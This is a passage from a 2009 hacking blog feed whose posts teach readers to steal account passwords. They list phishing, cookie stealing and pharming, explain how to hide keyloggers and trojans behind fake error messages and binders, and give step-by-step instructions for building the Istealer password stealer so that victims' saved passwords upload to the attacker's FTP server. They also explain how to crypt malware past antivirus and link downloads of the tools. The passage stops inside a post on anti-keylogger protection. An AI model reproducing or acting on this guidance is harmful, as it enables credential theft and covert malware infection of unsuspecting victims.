&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Ya this was one of the oldest trick to hack.. Try to convince your user that you are a legitimate person from the system and needs&amp;nbsp;your password for the continuation of the service or some maintainence.. This won't work now since most of the users are now aware about the Scam.. But this&amp;nbsp;Social Engginering concept is must for you to have to convince victim for many reasons..!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;&lt;b&gt;13. Phishing -&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to&amp;nbsp;enter his password, to get the same in your mail box..!! Use social engginering..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;14. Fake Messengers -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So its a form of phishing in the application format.. getting user, to enter the login info in the software and check your maill..!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;15. Cookie Stealer -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Here the cookie saved by the sites are taken and decoded and if you get lucky.. You have the password..!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;&lt;br /&gt;
&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;Hmmm.. not satisfied with single account at a time..?? so there are ways to hack lots of accounts together.. I know few but there exists many..!! listed are&amp;nbsp;the ones i know and will teach you in coming posts...&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;i&gt;&lt;b&gt;16. DNS Poisoning or PHARMING -&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So, phisihing is a tough job.. isn't it..?? convincing someone to enter their password at your page..?? what if you don't&amp;nbsp;have to convince..?? what if they are directed automatically to your site without having a clue..?? Nice huh..?? Pharming does the same for you.. More about&amp;nbsp;it in my next post..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;b&gt;&lt;i&gt;17. Whaling -&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;This method gets you the password of the accounts which are used by the hackers to recive the passwords.. So you just have to hack one ID,&amp;nbsp;which is simplest method( Easy then hacking any other account, will tell you how in coming posts..) and you will have loads of passwords and so loads of&amp;nbsp;accounts at your mercy..!!!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;I would like to add one thing the methods metioned under exiting ways are easy but are for newbiees and script kiddies so if you really want to learn hacking&amp;nbsp;then do some real work, then relaying on the softwares or tools.. will give info of that in my later posts.. or comment if you want any more info..&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;So thats all for now.. Comment if like the post.. I will highly Appriciate your interest..&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;span style="font-size: medium;"&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;njoy..&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Times, 'Times New Roman', serif; font-size: small;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4440228070324970473?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4440228070324970473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4440228070324970473'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4440228070324970473'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html' title='All Types Of Hacking Techniques.. 17 ways to bring accounts to your Mercy..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4504786031028727753</id><published>2009-10-06T22:26:00.000+05:30</published><updated>2009-10-06T22:26:02.984+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hiding Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><title type='text'>Fake error message generator : Hide keylogger and trojan</title><content type='html'>I have already explained about use of Binders and Crypters to hide our keyloggers and trojans. Today, I have written this article to inform you about one more hacking software which can be used to convince the victim that the software isn't malicious and some error crept in, Our Social Engginerring Tool -Fake error message creator. This software is of immense use if you wanna install your RAT server or keylogger remotely. I will tell you how to use this software in this article.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Fake Error message creator:&lt;/b&gt;&lt;br /&gt;
Suppose, you have sent keylogger or trojan to victim to install it on his computer. He runs the keylogger and gets an error message “Unable to open file- Runtime error”. Then he asks you for this message and you can easily say that “May be the file was not supported or was corrupt” and he believes you.&lt;br /&gt;
But, in this mean time, your server or keylogger is installed on his computer(without his knowledge) and you start hacking his computer remotely and also extracting passwords from his computer.&lt;br /&gt;
This is what a fake error message creator can do. This software helps you to create a fake error message to hide your trojan or keylogger from victim’s eyes.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How to use Fake Error message creator:&lt;/b&gt;&lt;br /&gt;
1.Download &lt;a href="http://www.ziddu.com/download/6801108/ErrorMessageHackerHubz.rar.html"&gt;Fake Error message creator&lt;/a&gt; software.&lt;br /&gt;
Password: hackerhubz&lt;br /&gt;
2. Unzip downloaded file.&lt;br /&gt;
3. Run the software (supports Windows XP and Windows Vista). Now, simply enter the information as you like and want the error message to look like.&lt;br /&gt;
4. After filling information, hit on “Build” and you will get “MessageBox.exe” file in current directory. You can bind this “MessageBox.exe” to keylogger to hide it from victim using Binder.&lt;br /&gt;
5. Here is the example&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_5rpSJrmeITE/Sst0fJRS2HI/AAAAAAAAAEA/YdmyInRJJvA/s1600-h/67ecb47233essage.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_5rpSJrmeITE/Sst0fJRS2HI/AAAAAAAAAEA/YdmyInRJJvA/s320/67ecb47233essage.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
and its resultant fake error message.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_5rpSJrmeITE/Sst0hhfXGfI/AAAAAAAAAEI/lb4zqIM3RNI/s1600-h/b2e483dcebeerror.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_5rpSJrmeITE/Sst0hhfXGfI/AAAAAAAAAEI/lb4zqIM3RNI/s320/b2e483dcebeerror.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
That’s it. Just try out this software to create fake error messages. As already said, this software is worthy for hiding RATs and keyloggers from victim’s eyes. If you have any problem in using this Fake error message creator software, please mention it in comments.&lt;br /&gt;
njoy hacking..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4504786031028727753?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4504786031028727753/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/fake-error-message-generator-hide.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4504786031028727753'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4504786031028727753'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/fake-error-message-generator-hide.html' title='Fake error message generator : Hide keylogger and trojan'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_5rpSJrmeITE/Sst0fJRS2HI/AAAAAAAAAEA/YdmyInRJJvA/s72-c/67ecb47233essage.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-2058199758831471259</id><published>2009-10-06T21:37:00.000+05:30</published><updated>2009-10-06T21:37:03.763+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='binders'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Passwords'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='RATs'/><title type='text'>Hack Tool : Istealer</title><content type='html'>Istealer like ardamax is an efficient windows password stealer software used to hack email account passwords and every online activity. I have already explained about RATs and keyloggers and Torjans to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Steps:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. Download &lt;a href="http://www.ziddu.com/download/6800456/IstealerHackerHubz.rar.html"&gt;Istealer password stealer&lt;/a&gt; software to start the hacking..&lt;br /&gt;
2. Go to http://www.esmartstart.com/ or any other free hosting site and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named “Istealer” at your FTP.&lt;br /&gt;
3. Run the Loader.exe file present in Istealer folder to get something like:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_5rpSJrmeITE/SstovM68VkI/AAAAAAAAAD4/pqfRuSko3DU/s1600-h/istealer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_5rpSJrmeITE/SstovM68VkI/AAAAAAAAAD4/pqfRuSko3DU/s320/istealer.png" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
4. Now, simply fill the following in Istealer:&lt;br /&gt;
Host: ftpserver.esmartdesign.com&lt;br /&gt;
Username and Password: Your username and password for esmartstart ftp server.&lt;br /&gt;
Directory: /Istealer&lt;br /&gt;
5. You can bind Istealer to any other file by checking “Bind with another file” and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim’s eyes.&lt;br /&gt;
6. To check whether you have entered right ftp server information, hit “Test” and if you have done it right, you will get message “Works perfect”. If it says “Cannot connect to FTP Server”, you have entered something wrong… just check it again.&lt;br /&gt;
7. When you’ve done all above steps, simply hit on “Build” and save the password stealer file as you want. You can also use crypters as i explained in last post for hiding it from AntiVirus Software.&lt;br /&gt;
8. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer use Social Engineering. After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.&lt;br /&gt;
&lt;br /&gt;
That’s it. Now, you can hack email account password using Istealer. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using this Istealer password stealer software to hack email account password, please mention it in comments.&lt;br /&gt;
njoy Istealer..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-2058199758831471259?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/2058199758831471259/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hack-tool-istealer.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2058199758831471259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2058199758831471259'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/hack-tool-istealer.html' title='Hack Tool : Istealer'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_5rpSJrmeITE/SstovM68VkI/AAAAAAAAAD4/pqfRuSko3DU/s72-c/istealer.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-4572954391388389919</id><published>2009-10-06T20:50:00.000+05:30</published><updated>2009-10-06T20:57:42.048+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='binders'/><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hiding Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><title type='text'>Binders : Hackers best friend..</title><content type='html'>&lt;span style="color: black;"&gt;&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: black;"&gt;&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;br /&gt;
So now we know about hacking tools like trojans, RATs, Keyloggers, Crypters to prevent their detection but the bottleneck is still the program execution on the remote machine... Generally user don't run untrusted applications.. so the solution is to bind our tool with something they trust so that when they run it they will get their program running and we will get &amp;nbsp;ours!!!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is Binder???&lt;/b&gt;&lt;br /&gt;
Binder is a software used to bind or combine two or more files in one file under one name and extension. The files to be binded can have any extension or icon. The user has choice to select the name, icon and various attributes of binded file. If binded file contains an application (in our case - RAT or keylogger), the application is also run when the actual binded file is run.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Why is Binder used???&lt;/b&gt;&lt;br /&gt;
As I mentioned before, generally, RATs and keyloggers are detected by most antiviruses. Also, you can’t send victim a RAT or keylogger and ask him to install it on his computer. So, you have to bind that RAT or keylogger with say image, movie or song (any file depending on victim) and then ask him to run this binded file on his computer.&lt;br /&gt;
When the victim runs our binded image (binded with keylogger) on his computer, keylogger is installed on his computer and we can easily obtain all his typed passwords. Kwel..!!!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How can I get a Binder???&lt;/b&gt;&lt;br /&gt;
There are many available online you can search for them.. I am also providing few binding software, can download it from here too..&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6799810/SimpleBinderHackerzHub.rar.html"&gt;Simple Binder&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/6799829/WeekendBinderHackerHubz.rar.html"&gt;Weekend Binder&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
All publicly available Binders are detected by Antivirus Software but can be used to fool few cause some ignore scanning mp3 or image files and you can also apply your social engineering here for convincing the victim..!!!&lt;br /&gt;
&lt;br /&gt;
Also, it is better to use Crypters to avoid AV detection. It is general practice to first crypt the keylogger or trojan with Crypter and then bind the crypted trojan to make it deceptive.&lt;br /&gt;
&lt;br /&gt;
So till the next post.. Njoy Hacking!!!&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4572954391388389919?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4572954391388389919/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/binders-hackers-best-friend.html#comment-form' title='15 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4572954391388389919'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4572954391388389919'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/binders-hackers-best-friend.html' title='Binders : Hackers best friend..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>15</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-2992649291150494264</id><published>2009-10-06T01:34:00.000+05:30</published><updated>2009-10-06T03:10:00.009+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trojans'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='RATs'/><category scheme='http://www.blogger.com/atom/ns#' term='Crypter'/><title type='text'>Crypters, Make your Trojans, Keyloggers and RATs UnDetectable...!!!</title><content type='html'>&lt;span class="Apple-style-span" style="font-size: large; line-height: 20px;"&gt;&lt;span class="Apple-style-span" style="font-size: medium; line-height: normal;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
So, We already talked about trojans, RATs and about Keyloggers and the publiclly available ones among these are detected by almost all the anti-virus softwares..&lt;br /&gt;
So, how to hide it from antivirus softwares??? Well here is the solution : &lt;a href="http://www.ziddu.com/download/6787991/CryptersHackerHubz.rar.html"&gt;&lt;b&gt;Crypters..&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What are Crypters??&lt;/b&gt;&lt;br /&gt;
As said above, Crypter is hacking program or application used to hide our viruses or RATs from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antiviruses work by splitting source code of application and then search for certain string within source code.&lt;br /&gt;
If AV detects any certain malicious strings, it either stops its execution and scan it or deletes the file as virus, making all our efforts useless..&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;What does Crypter do???&lt;/b&gt;&lt;br /&gt;
Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is FUD ???&lt;/b&gt;&lt;br /&gt;
FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide RATs became more complicated as nowadays, no publicly available crypter is FUD.&lt;br /&gt;
So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain “FUD” for maximum of one or two days after their public release.&lt;br /&gt;
&lt;br /&gt;
To obtain FUD crypters, you have to either search for it in hacking forums or make one.. But its worth the search..&lt;br /&gt;
I am posting two Crypters that i use.. &lt;a href="http://www.ziddu.com/download/6787991/CryptersHackerHubz.rar.html"&gt;Download it Here..&lt;/a&gt;&lt;br /&gt;
Password: &lt;b&gt;hackerhubz&lt;/b&gt;&lt;br /&gt;
Turn off your anti-virus if it detects it as hack tool and then extract again..&lt;br /&gt;
&lt;br /&gt;
Do Comment if you have any query or if you njoyed reading the post..&lt;br /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-2992649291150494264?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/2992649291150494264/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/crypters-make-your-trojans-keyloggers.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2992649291150494264'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2992649291150494264'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/crypters-make-your-trojans-keyloggers.html' title='Crypters, Make your Trojans, Keyloggers and RATs UnDetectable...!!!'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-6427493746137135391</id><published>2009-10-06T00:57:00.000+05:30</published><updated>2009-10-06T01:42:11.411+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Protection'/><category scheme='http://www.blogger.com/atom/ns#' term='Anti Keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><title type='text'>Protect Yourself From Keyloggers..</title><content type='html'>&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;In my last post i mentioned about keyloggers and their intrusion in your privacy.. So now i am suggesting a tool for all of you to protect yourself from keylogger attacks.. If you wanna know more about keyloggers and how tohack using them refer my last post. &amp;nbsp;In short, they are malicious tools which intercepts your every keystrokes along with your password and provide it to attackers..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;So now how to protect your self from these keylogging attack?? and how to protect your login credentials..???&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_5rpSJrmeITE/SspG_P9Lo-I/AAAAAAAAADo/UEMcmHfeopw/s1600-h/keyscrambler.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_5rpSJrmeITE/SspG_P9Lo-I/AAAAAAAAADo/UEMcmHfeopw/s320/keyscrambler.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;Key Scrambler Personal is a free anti keylogger serving our purpose in the web browser, which intercepts every keystrokes you enter online and thus sending the encrypted message to hacker rendering them useless for them..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial, Helvetica, sans-serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
